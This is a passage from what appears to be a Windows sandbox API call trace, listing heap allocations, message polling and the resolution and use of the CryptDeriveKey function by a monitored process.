hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0231.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0231.681] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0231.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0231.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0231.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0231.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0231.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0231.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0231.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0231.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0231.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0231.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0231.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0231.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0231.682] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0231.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0231.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51508 [0231.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0231.683] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0231.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0231.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0231.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0231.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0231.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0231.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0231.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0231.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0231.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0231.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0231.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0231.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0231.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0231.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0231.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0231.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0231.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0231.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0231.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0231.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.684] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0231.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0231.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51400 [0231.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0231.685] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0231.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0231.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0231.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0231.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0231.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0231.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0231.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0231.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0231.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0231.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0231.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0231.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0231.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0231.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0231.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0231.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0231.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0231.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0231.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0231.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0231.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0231.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0231.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0231.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0231.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0231.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0231.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0231.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0231.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0231.686] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0231.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0231.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0231.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0231.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0231.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0231.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0231.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0231.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0231.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0231.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0231.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0231.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0231.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0231.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0231.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0231.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0231.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0231.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0231.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0231.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0231.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0231.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0231.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0231.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0231.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0231.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0231.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0231.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0231.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0231.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0231.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0231.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0231.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0231.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0231.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0231.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0231.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0231.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0231.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0231.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0231.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0231.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0231.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0231.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0231.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0231.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0231.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0231.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e512f8 [0231.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e512f8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0231.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0231.690] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0231.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0231.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0231.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0231.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0231.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0231.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0231.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0231.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0231.690] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa876d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87250) returned 1 [0231.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0231.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0231.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0231.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0231.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0231.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0231.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0231.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0231.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0231.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0231.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0231.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0231.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0231.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0231.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0231.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0231.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0231.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0231.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0231.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0231.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0231.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0231.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0231.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0231.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0231.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0231.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0231.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0231.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0231.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0231.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0231.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0231.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0231.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0231.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0231.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0231.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0231.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0231.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0231.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0231.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0231.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0231.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: 